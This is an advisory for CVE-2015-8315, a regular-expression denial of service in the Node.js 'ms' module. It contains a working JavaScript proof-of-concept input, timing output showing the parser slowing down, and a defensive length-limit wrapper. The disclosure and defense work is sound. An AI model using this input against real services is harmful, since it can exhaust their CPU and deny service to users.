Regular Expression Denial of Service

Module: ms

Published: October 24th, 2015

Reported by: Adam Baldwin

CVE-2015-8315

CWE-400

Vulnerable: <=0.7.0
Patched: >0.7.0

Overview

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

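var ms = require('ms');

// Build a string of len + 1 copies of chr.
var genstr = function (len, chr) {
   var result = "";
   for (var i = 0; i <= len; i++) {
       result = result + chr;
   }

   return result;
};

// A long run of digits followed by an invalid unit ("minutea").
ms(genstr(Number(process.argv[2]), "5") + " minutea");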

Results

Execution time increases with the length of the input string:

$ time node ms.js 10000

real    0m0.758s
user    0m0.724s
sys    0m0.031s

$ time node ms.js 20000

real    0m2.580s
user    0m2.494s
sys    0m0.047s

$ time node ms.js 30000

real    0m5.747s
user    0m5.483s
sys    0m0.080s

$ time node ms.js 80000

real    0m41.022s
user    0m38.894s
sys    0m0.529s

Remediation

Update to version 0.7.1 or later. Alternatively, apply a reasonable length limit to parsed version strings.
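One way to apply the length limit suggested above, as an added example that is not part of the original advisory or of the ms project. The names withLengthLimit, MAX_LEN and standInParser are hypothetical, the 100-character limit is an assumed value, and the stand-in parser replaces require('ms') so the block runs offline.

```javascript
// Assumption: 100 characters is ample for inputs such as "2 days" or "1.5h";
// set MAX_LEN to the longest value your application legitimately accepts.
const MAX_LEN = 100;

// Wrap any string parser so that over-long or non-string input is rejected
// before the parser (and its regular expression) ever runs.
function withLengthLimit(parse, maxLen = MAX_LEN) {
  return function limitedParse(input) {
    if (typeof input !== 'string') {
      throw new TypeError('expected a string');
    }
    if (input.length > maxLen) {
      throw new RangeError(
        'input length ' + input.length + ' exceeds limit ' + maxLen);
    }
    return parse(input);
  };
}

// Constructed stand-in for require('ms'): it only understands
// "<integer> minutes" and counts how often it is invoked.
let parserCalls = 0;
function standInParser(str) {
  parserCalls += 1;
  const m = /^(\d{1,10}) minutes?$/.exec(str);
  return m ? Number(m[1]) * 60000 : undefined;
}

const safeParse = withLengthLimit(standInParser);

// Constructed inputs: one ordinary value and one shaped like the
// proof-of-concept input (80000 digits followed by " minutea").
function demo() {
  parserCalls = 0;
  const ok = safeParse('5 minutes');
  let rejected = false;
  try {
    safeParse('5'.repeat(80000) + ' minutea');
  } catch (e) {
    rejected = e instanceof RangeError;
  }
  // parserCalls stays at 1: the oversized string never reached the parser.
  return { ok: ok, rejected: rejected, parserCalls: parserCalls };
}

console.log(demo());
```

In an application, pass the real parser instead of the stand-in, for example withLengthLimit(require('ms')), and apply the wrapper wherever the string comes from untrusted input.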